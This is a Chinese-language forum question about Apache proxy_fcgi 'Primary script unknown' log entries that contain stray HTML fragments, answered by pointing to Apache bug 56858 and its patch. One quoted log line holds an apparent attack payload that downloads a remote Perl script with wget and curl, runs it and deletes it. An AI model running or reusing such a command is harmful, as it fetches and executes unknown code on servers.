随机 HTML 和 cookie 值被附加到 apache proxy_fcgi 错误消息中

随机 HTML 和 cookie 值被附加到 apache proxy_fcgi 错误消息中

我在我的 Web 服务器上使用带有 PHP-FPM 的 Apache。当用户输入 Apache 传递给 proxy-fcgi 的某个随机路径名并且无法找到该文件时,错误日志中会记录一个标准错误:

AH01071: Got error 'Primary script unknown\n'

然而,在某些情况下,我会从我的网站的随机页面获取一段 HTML,如下所示:

AH01071: Got error 'Primary script unknown\n\r\n\r\n<!DOCTYPE html>\n\n<html>\n<head>\n<title>Title of My Webpage</title>\n<meta charset='UTF-8'>\n<meta na.....

所以:

AH01071: Got error 'Primary script unknown\nmmary'>\n<colgroup>\n<col/><col/><col/><col/>\n</colgroup>\n<tbody>\n<tr><td....

当我今天看到这样的事情时,我真的很担心:

AH01071: Got error 'Primary script unknown\nmp;wget http://redacted/sacd ; curl -O http://redacted/sacd ; perl sacd ;rm -rf sac*"); charset='UTF-8'>\n<meta name='format-de....

我认为这是随机 HTML 块中散布的 cookie 值。有人遇到过这种现象吗?可以做些什么来阻止将随机 HTML 和 cookie 附加到错误消息中吗?

答案1

这是错误 56858,将在下一个版本 2.4.x(2.4.11?)中修复。以下是补丁程序:

http://svn.apache.org/viewvc?view=revision&revision=1621602

相关内容